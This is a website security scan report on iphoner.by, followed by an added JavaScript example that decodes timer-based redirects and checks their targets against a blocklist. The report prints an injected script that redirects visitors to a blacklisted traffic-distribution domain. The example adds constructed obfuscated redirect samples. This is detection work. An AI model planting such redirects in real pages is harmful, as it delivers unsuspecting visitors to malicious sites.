Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iphoner.by
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iphoner.by/ | 200 OK Content-Length: 110627 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: tds-on.com
window.setTimeout("document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz'", 30000);
Decoded script: document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz'
/*** called setTimeout with document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz', 30000 */
http://iphoner.by/engine/classes/min/index.php?charset=windows-1251&g=general&2 | 200 OK Content-Length: 151191 Content-Type: application/x-javascript | clean |
http://iphoner.by/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&2 | 200 OK Content-Length: 31982 Content-Type: application/x-javascript | clean |
http://iphoner.by/templates/turnion/js/scripts.js | 200 OK Content-Length: 4574 Content-Type: application/javascript | clean |
http://bitly.com/Uc2Jra | HTTP/1.1 302 Found Cache-Control: private; max-age=90 Connection: close Date: Fri, 26 Sep 2014 13:47:43 GMT Location: http://bit.ly/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=Uc2Jra Server: nginx Content-Length: 185 Content-Type: text/html; charset=utf-8 Mime-Version: 1.0 Set-Cookie: _bit=54256e7f-0033c-033a4-401cf10a;domain=.bitly.com;expires=Wed Mar 25 13:47:43 2015;path=/; HttpOnly | clean |
http://bit.ly/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Fri, 26 Sep 2014 13:47:44 GMT Pragma: no-cache Location: https://bitly.com/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | clean |
https://bitly.com/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra | 200 OK Content-Length: 7487 Content-Type: text/html | clean |
http://bitly.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Sep 2014 13:47:45 GMT Location: https://bitly.com/test404page.js Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | clean |
https://bitly.com/test404page.js | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com/ | 200 OK Content-Length: 82868 Content-Type: text/html | clean |
https://bitly.com/pages/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-content/plugins/bitly/js/bitly-client.js | 200 OK Content-Length: 1164 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-content/themes/bitly/library/js/libs/modernizr/modernizr.custom.min.js | 200 OK Content-Length: 15126 Content-Type: application/x-javascript | clean |
https://bitly.com//use.typekit.net/mys2uzu.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com//platform.linkedin.com/in.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com//ws.sharethis.com/button/buttons.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com/pages/wp-content/plugins/wp-retina-2x/js/retina.js | 200 OK Content-Length: 5682 Content-Type: application/x-javascript | clean |
Note on the bit.ly rows: the short link http://bitly.com/Uc2Jra never reached its target. bit.ly answered with a 302 to its own interstitial warning page, and the url parameter in that Location header decodes to http://ya-zdorov.net/news/code.js. That destination was not fetched by the scan, so the "clean" status on these rows covers only the bit.ly pages themselves, not the script the short link points to.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iphoner.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 13:43:56 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 25 Sep 2014 20:43:57 -0700 GMT
Set-Cookie: PHPSESSID=dae6g4kfsp40kpgqspppq04ou2; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: iphoner.by
Referer: http://www.google.com/search?q=iphoner.by
Result:
The response is similar to the first query; no referer-conditional redirect was found. This check only detects redirects that appear when the Referer is a search engine, so it says nothing about the delayed setTimeout redirect to tds-on.com reported above under Scanned pages/files.
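The two checks in this report, decoding a redirect staged through setTimeout("document.location.href=...", ms) under Scanned pages/files and comparing a normal visit with a search-engine-referred visit under Malicious Redirects, can be reproduced offline with the following added example. It is not the scanner's code and not code from iphoner.by. It pulls every redirect vector out of a raw response (Location header, meta refresh, direct location assignment, and the string form of setTimeout/setInterval after undoing \xHH-style escapes), marks destination hosts found in a blocklist, and diffs the findings of two fetches. The blocklist entry, the sample bodies, and the cloaked variant with two extra redirects are constructed for the example; only the setTimeout line and the bit.ly Location header are copied from the report.

```javascript
// Added example, not code from the scanner or from iphoner.by.
// BLOCKLIST and all sample responses below are constructed for this example.

const BLOCKLIST = new Set(['tds-on.com']); // assumed: the domain the report flagged

// Undo the escapes (\xHH, \uHHHH, \', \\ ...) often used to hide code passed to setTimeout.
function decodeJsString(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\(.)/g, (m, hex, uni, ch) => {
    if (hex) return String.fromCharCode(parseInt(hex, 16));
    if (uni) return String.fromCharCode(parseInt(uni, 16));
    return ch === 'n' ? '\n' : ch === 't' ? '\t' : ch;
  });
}

const LOCATION_RE = /(?:document|window|top|self)\.location(?:\.href)?\s*=\s*(["'])(.*?)\1/g;
// setTimeout/setInterval whose first argument is a string literal: the string is evaluated
// as code after the delay, which is how the 30-second redirect in the report is staged.
const TIMER_RE = /set(?:Timeout|Interval)\s*\(\s*(["'])((?:\\.|(?!\1).)*?)\1\s*,\s*(\d+)/g;
const META_RE = /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']\s*(\d+)\s*;\s*url\s*=\s*([^"'>\s]+)/gi;

function hostOf(url, base) {
  try { return new URL(url, base).hostname.toLowerCase(); } catch { return null; }
}

function finding(vector, url, delayMs, base) {
  const host = hostOf(url, base);
  return { vector, url, delayMs, host, blocklisted: host !== null && BLOCKLIST.has(host) };
}

// response = { url, status, headers (lower-case names), body }
function extractRedirects(response) {
  const base = response.url;
  const out = [];
  if (response.headers.location) {
    out.push(finding('http-location', response.headers.location, 0, base));
  }
  for (const m of response.body.matchAll(META_RE)) {
    out.push(finding('meta-refresh', m[2], Number(m[1]) * 1000, base));
  }
  for (const m of response.body.matchAll(TIMER_RE)) {
    const code = decodeJsString(m[2]);
    for (const l of code.matchAll(LOCATION_RE)) {
      out.push(finding('js-timer', l[2], Number(m[3]), base));
    }
  }
  // Strip the timer calls first so their string payloads are not counted a second time.
  for (const l of response.body.replace(TIMER_RE, '').matchAll(LOCATION_RE)) {
    out.push(finding('js-immediate', l[2], 0, base));
  }
  return out;
}

const keyOf = (f) => `${f.vector}|${f.delayMs}|${f.url}`;

// Same URL fetched twice: once plain, once with Referer: http://www.google.com/search?q=...
function compareVariants(plain, referred) {
  const a = new Map(extractRedirects(plain).map((f) => [keyOf(f), f]));
  const b = new Map(extractRedirects(referred).map((f) => [keyOf(f), f]));
  return {
    common: [...a.values()].filter((f) => b.has(keyOf(f))),
    onlyInPlain: [...a.values()].filter((f) => !b.has(keyOf(f))),
    onlyInReferred: [...b.values()].filter((f) => !a.has(keyOf(f))),
  };
}

// Constructed sample body carrying the exact setTimeout line the report decoded.
const IPHONER_BODY = `<html><head><title>iPhoner</title></head><body>
<script>window.setTimeout("document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz'", 30000);</script>
</body></html>`;
const plainVisit = { url: 'http://iphoner.by/', status: 200,
  headers: { 'content-type': 'text/html' }, body: IPHONER_BODY };
const searchVisit = { ...plainVisit }; // the report saw the same page with a Google Referer

// Constructed cloaking case (hypothetical, not from the report): two extra redirects that
// would only be served when the Referer is a search engine, one of them hex-escaped.
const CLOAKED_BODY = IPHONER_BODY +
  `<meta http-equiv="refresh" content="5;url=http://tds-on.com/meta">` +
  `<script>setTimeout('\\x64ocument.location.href="http://tds-on.com/go"', 0);</script>`;
const cloakedSearchVisit = { ...plainVisit, body: CLOAKED_BODY };

// Constructed from the bit.ly rows: a 302 whose Location is bit.ly's own warning page.
const bitlyHop = { url: 'http://bitly.com/Uc2Jra', status: 302,
  headers: { location: 'http://bit.ly/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=Uc2Jra' },
  body: '' };
```

compareVariants(plainVisit, searchVisit) reproduces the report's second check: the delayed tds-on.com redirect is in both responses, so onlyInReferred is empty and the page is not referer-cloaked, yet extractRedirects(plainVisit) still flags it as blocklisted. Run against cloakedSearchVisit, the same comparison returns the meta refresh and the hex-escaped timer redirect as findings present only on the referred visit. A real run would fetch the two responses with and without the Referer header and feed them to compareVariants; the headers object must use lower-case names.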